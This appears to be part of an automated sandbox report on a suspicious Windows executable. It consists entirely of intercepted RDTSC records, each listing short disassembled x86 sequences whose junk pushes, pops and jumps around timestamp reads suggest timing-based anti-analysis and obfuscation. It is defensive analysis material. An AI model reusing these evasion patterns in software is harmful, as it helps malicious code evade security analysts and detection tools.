Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 73A0C97 second address: 73A0CC8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAACBBF206h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c pushad 0x0000000d push esi 0x0000000e pop ebx 0x0000000f mov eax, 23FF5FFFh 0x00000014 popad 0x00000015 movzx eax, bx 0x00000018 popad 0x00000019 pop ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 73A0CC8 second address: 73A0CCE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 73A0CCE second address: 73A0CE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAAACBBF1FEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 73A0CE0 second address: 73A0CE4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 73406FF second address: 734071A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAACBBF201h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 734071A second address: 734074A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FAAAD0E3C68h 0x0000000a and eax, 53AF9088h 0x00000010 jmp 00007FAAAD0E3C5Bh 0x00000015 popfd 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 734074A second address: 7340784 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAACBBF209h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b movzx ecx, bx 0x0000000e mov edx, 246BC32Ch 0x00000013 popad 0x00000014 mov ebp, esp 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FAAACBBF1FEh 0x0000001d rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 7340784 second address: 73407A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAD0E3C5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007FAAAD0E3C5Bh 0x00000012 mov cx, FBAFh 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 73407A7 second address: 73407BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAAACBBF200h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 73407BB second address: 73407BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 72E0683 second address: 72E06B0 instructions: 0x00000000 rdtsc 0x00000002 mov si, 602Dh 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushfd 0x00000009 jmp 00007FAAACBBF1FAh 0x0000000e or eax, 7AF0C8C8h 0x00000014 jmp 00007FAAACBBF1FBh 0x00000019 popfd 0x0000001a popad 0x0000001b xchg eax, ebp 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 72E06B0 second address: 72E06B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 72E0AEF second address: 72E0AF5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 72E0AF5 second address: 72E0AFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 72E0AFB second address: 72E0AFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 7330A32 second address: 7330A80 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, bx 0x00000006 jmp 00007FAAAD0E3C63h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ebp 0x0000000f jmp 00007FAAAD0E3C66h 0x00000014 mov ebp, esp 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FAAAD0E3C67h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 7330A80 second address: 7330ABC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, ACh 0x00000005 pushfd 0x00000006 jmp 00007FAAACBBF200h 0x0000000b or si, E9C8h 0x00000010 jmp 00007FAAACBBF1FBh 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 pop ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d jmp 00007FAAACBBF1FBh 0x00000022 push eax 0x00000023 pop edi 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 7330ABC second address: 7330AC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 7310068 second address: 73100C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 mov ebp, esp 0x00000008 pushad 0x00000009 mov di, cx 0x0000000c pushfd 0x0000000d jmp 00007FAAACBBF1FAh 0x00000012 add cx, DCC8h 0x00000017 jmp 00007FAAACBBF1FBh 0x0000001c popfd 0x0000001d popad 0x0000001e and esp, FFFFFFF0h 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 pushfd 0x00000025 jmp 00007FAAACBBF1FBh 0x0000002a or ecx, 05B9CB0Eh 0x00000030 jmp 00007FAAACBBF209h 0x00000035 popfd 0x00000036 movzx ecx, bx 0x00000039 popad 0x0000003a rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 73100C7 second address: 73100CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 73100CD second address: 73100D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 73100D1 second address: 73100FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAD0E3C64h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b sub esp, 44h 0x0000000e pushad 0x0000000f mov esi, 18083ECDh 0x00000014 popad 0x00000015 push esi 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 73100FC second address: 7310100 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 7310100 second address: 7310104 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 7310104 second address: 731010A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 731010A second address: 731016E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FAAAD0E3C66h 0x00000009 and ch, 00000048h 0x0000000c jmp 00007FAAAD0E3C5Bh 0x00000011 popfd 0x00000012 mov bx, si 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 mov dword ptr [esp], ebx 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007FAAAD0E3C60h 0x00000022 sub al, FFFFFFA8h 0x00000025 jmp 00007FAAAD0E3C5Bh 0x0000002a popfd 0x0000002b mov edx, eax 0x0000002d popad 0x0000002e xchg eax, esi 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 mov edi, 719F29A2h 0x00000037 mov di, 3DEEh 0x0000003b popad 0x0000003c rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 731016E second address: 7310198 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAACBBF204h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FAAACBBF1FDh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 7310198 second address: 73101AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAD0E3C61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | RDTSC instruction interceptor: First address: 73101AD second address: 7310245 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 7EE84862h 0x00000008 pushfd 0x00000009 jmp 00007FAAACBBF203h 0x0000000e sbb al, 0000005Eh 0x00000011 jmp 00007FAAACBBF209h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, esi 0x0000001b pushad 0x0000001c jmp 00007FAAACBBF1FCh 0x00000021 pushfd 0x00000022 jmp 00007FAAACBBF202h 0x00000027 or si, E488h 0x0000002c jmp 00007FAAACBBF1FBh 0x00000031 popfd 0x00000032 popad 0x00000033 xchg eax, edi 0x00000034 pushad 0x00000035 push eax 0x00000036 push edx 0x00000037 pushfd 0x00000038 jmp 00007FAAACBBF202h 0x0000003d and ecx, 54AC46E8h 0x00000043 jmp 00007FAAACBBF1FBh 0x00000048 popfd 0x00000049 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | RDTSC instruction interceptor: First address: 7310245 second address: 7310275 instructions: 0x00000000 rdtsc 0x00000002 call 00007FAAAD0E3C68h 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FAAAD0E3C61h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | RDTSC instruction interceptor: First address: 7310275 second address: 73102D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAACBBF200h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c mov ax, dx 0x0000000f mov dx, B7C0h 0x00000013 popad 0x00000014 xchg eax, edi 0x00000015 pushad 0x00000016 mov ax, bx 0x00000019 call 00007FAAACBBF201h 0x0000001e pushfd 0x0000001f jmp 00007FAAACBBF200h 0x00000024 xor ecx, 3A408938h 0x0000002a jmp 00007FAAACBBF1FBh 0x0000002f popfd 0x00000030 pop esi 0x00000031 popad 0x00000032 mov edi, dword ptr [ebp+08h] 0x00000035 pushad 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | RDTSC instruction interceptor: First address: 73102D5 second address: 7310308 instructions: 0x00000000 rdtsc 0x00000002 call 00007FAAAD0E3C5Eh 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov bh, FFh 0x0000000c popad 0x0000000d mov dword ptr [esp+24h], 00000000h 0x00000015 jmp 00007FAAAD0E3C5Ah 0x0000001a lock bts dword ptr [edi], 00000000h 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 mov al, bl 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | RDTSC instruction interceptor: First address: 7310308 second address: 731030E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | RDTSC instruction interceptor: First address: 731030E second address: 7310312 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | RDTSC instruction interceptor: First address: 7310312 second address: 7310331 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jc 00007FAB1CDC130Fh 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FAAACBBF1FFh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | RDTSC instruction interceptor: First address: 7310331 second address: 7310357 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAD0E3C69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov esi, edx 0x0000000f push ebx 0x00000010 pop eax 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | RDTSC instruction interceptor: First address: 7310357 second address: 73103A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop edx 0x00000005 mov bl, al 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b pushad 0x0000000c push edi 0x0000000d pushfd 0x0000000e jmp 00007FAAACBBF1FEh 0x00000013 and esi, 39C9CD18h 0x00000019 jmp 00007FAAACBBF1FBh 0x0000001e popfd 0x0000001f pop esi 0x00000020 mov dh, 86h 0x00000022 popad 0x00000023 pop ebx 0x00000024 jmp 00007FAAACBBF200h 0x00000029 mov esp, ebp 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e mov edx, 6B7F62BCh 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | RDTSC instruction interceptor: First address: 734086A second address: 7340870 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | RDTSC instruction interceptor: First address: 7340870 second address: 73408A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAACBBF1FDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov edx, eax 0x0000000d mov eax, 3582AFFFh 0x00000012 popad 0x00000013 mov ebp, esp 0x00000015 jmp 00007FAAACBBF202h 0x0000001a pop ebp 0x0000001b pushad 0x0000001c pushad 0x0000001d push esi 0x0000001e pop edi 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | RDTSC instruction interceptor: First address: 73408A6 second address: 73408B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 mov ax, 74FBh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | RDTSC instruction interceptor: First address: 7330916 second address: 733091A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | RDTSC instruction interceptor: First address: 733091A second address: 7330937 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAD0E3C69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | RDTSC instruction interceptor: First address: 7330937 second address: 7330955 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ah, bh 0x00000005 mov ch, F0h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FAAACBBF201h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | RDTSC instruction interceptor: First address: 7330955 second address: 7330972 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edx 0x00000005 mov esi, ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FAAAD0E3C60h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | RDTSC instruction interceptor: First address: 7330972 second address: 7330978 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | RDTSC instruction interceptor: First address: 7330978 second address: 733097C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | RDTSC instruction interceptor: First address: 733097C second address: 73309AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b mov dx, DC6Ah 0x0000000f mov edx, 3E465536h 0x00000014 popad 0x00000015 pop ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FAAACBBF208h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | RDTSC instruction interceptor: First address: 7340A90 second address: 7340ABA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, ebx 0x00000005 mov ebx, 36304336h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f mov dx, si 0x00000012 call 00007FAAAD0E3C66h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | RDTSC instruction interceptor: First address: 7340ABA second address: 7340B0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 xchg eax, ebp 0x00000007 jmp 00007FAAACBBF207h 0x0000000c mov ebp, esp 0x0000000e jmp 00007FAAACBBF206h 0x00000013 push dword ptr [ebp+04h] 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FAAACBBF207h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | RDTSC instruction interceptor: First address: 7390E9D second address: 7390EA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | RDTSC instruction interceptor: First address: 73A0416 second address: 73A041C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | RDTSC instruction interceptor: First address: 73A041C second address: 73A043E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAD0E3C69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | RDTSC instruction interceptor: First address: 73A043E second address: 73A04A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007FAAACBBF1FFh 0x0000000b xor eax, 5615DACEh 0x00000011 jmp 00007FAAACBBF209h 0x00000016 popfd 0x00000017 popad 0x00000018 mov ebp, esp 0x0000001a jmp 00007FAAACBBF1FEh 0x0000001f xchg eax, ebx 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 mov edi, 586CF360h 0x00000028 call 00007FAAACBBF209h 0x0000002d pop eax 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | RDTSC instruction interceptor: First address: 73A04A8 second address: 73A04CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAD0E3C5Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FAAAD0E3C5Bh 0x0000000f xchg eax, ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | RDTSC instruction interceptor: First address: 73A04CF second address: 73A04F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAACBBF1FCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d call 00007FAAACBBF1FDh 0x00000012 pop eax 0x00000013 mov eax, edi 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | RDTSC instruction interceptor: First address: 73A04F4 second address: 73A0548 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FAAAD0E3C68h 0x00000009 xor si, 2CC8h 0x0000000e jmp 00007FAAAD0E3C5Bh 0x00000013 popfd 0x00000014 mov ebx, eax 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a pushad 0x0000001b movsx ebx, si 0x0000001e mov cx, 82D3h 0x00000022 popad 0x00000023 xchg eax, esi 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007FAAAD0E3C65h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | RDTSC instruction interceptor: First address: 73A0548 second address: 73A054E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | RDTSC instruction interceptor: First address: 73A054E second address: 73A0552 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | RDTSC instruction interceptor: First address: 73A0552 second address: 73A05F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAACBBF203h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov esi, dword ptr [ebp+08h] 0x0000000e jmp 00007FAAACBBF206h 0x00000013 sub ecx, ecx 0x00000015 jmp 00007FAAACBBF201h 0x0000001a xchg eax, edi 0x0000001b pushad 0x0000001c jmp 00007FAAACBBF1FCh 0x00000021 jmp 00007FAAACBBF202h 0x00000026 popad 0x00000027 push eax 0x00000028 pushad 0x00000029 pushfd 0x0000002a jmp 00007FAAACBBF201h 0x0000002f and ecx, 5CF7C366h 0x00000035 jmp 00007FAAACBBF201h 0x0000003a popfd 0x0000003b popad 0x0000003c xchg eax, edi 0x0000003d push eax 0x0000003e push edx 0x0000003f pushad 0x00000040 mov bx, ax 0x00000043 mov eax, 24D0D2A1h 0x00000048 popad 0x00000049 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | RDTSC instruction interceptor: First address: 73A05F2 second address: 73A0631 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAD0E3C67h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, 00000001h 0x0000000e jmp 00007FAAAD0E3C66h 0x00000013 lock cmpxchg dword ptr [esi], ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | RDTSC instruction interceptor: First address: 73A0631 second address: 73A0638 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | RDTSC instruction interceptor: First address: 73A0638 second address: 73A066D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAD0E3C66h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, eax 0x0000000b jmp 00007FAAAD0E3C60h 0x00000010 cmp ecx, 01h 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | RDTSC instruction interceptor: First address: 73A066D second address: 73A068A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAACBBF209h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | RDTSC instruction interceptor: First address: 73A068A second address: 73A0762 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAD0E3C61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007FAB1D255B85h 0x0000000f pushad 0x00000010 pushad 0x00000011 call 00007FAAAD0E3C5Ah 0x00000016 pop ecx 0x00000017 pushfd 0x00000018 jmp 00007FAAAD0E3C5Bh 0x0000001d adc esi, 1AEC697Eh 0x00000023 jmp 00007FAAAD0E3C69h 0x00000028 popfd 0x00000029 popad 0x0000002a push ecx 0x0000002b call 00007FAAAD0E3C67h 0x00000030 pop ecx 0x00000031 pop ebx 0x00000032 popad 0x00000033 pop edi 0x00000034 pushad 0x00000035 mov cx, 36C1h 0x00000039 pushfd 0x0000003a jmp 00007FAAAD0E3C5Eh 0x0000003f and si, 0ED8h 0x00000044 jmp 00007FAAAD0E3C5Bh 0x00000049 popfd 0x0000004a popad 0x0000004b pop esi 0x0000004c pushad 0x0000004d pushad 0x0000004e mov ch, 29h 0x00000050 pushfd 0x00000051 jmp 00007FAAAD0E3C67h 0x00000056 adc eax, 40A9464Eh 0x0000005c jmp 00007FAAAD0E3C69h 0x00000061 popfd 0x00000062 popad 0x00000063 push ecx 0x00000064 push eax 0x00000065 push edx 0x00000066 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | RDTSC instruction interceptor: First address: 73A0762 second address: 73A0793 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007FAAACBBF205h 0x00000010 jmp 00007FAAACBBF1FBh 0x00000015 popfd 0x00000016 mov cx, 172Fh 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | RDTSC instruction interceptor: First address: 7360B09 second address: 7360B18 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAD0E3C5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | RDTSC instruction interceptor: First address: 7360B18 second address: 7360B45 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAACBBF209h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FAAACBBF1FDh 0x00000011 rdtsc
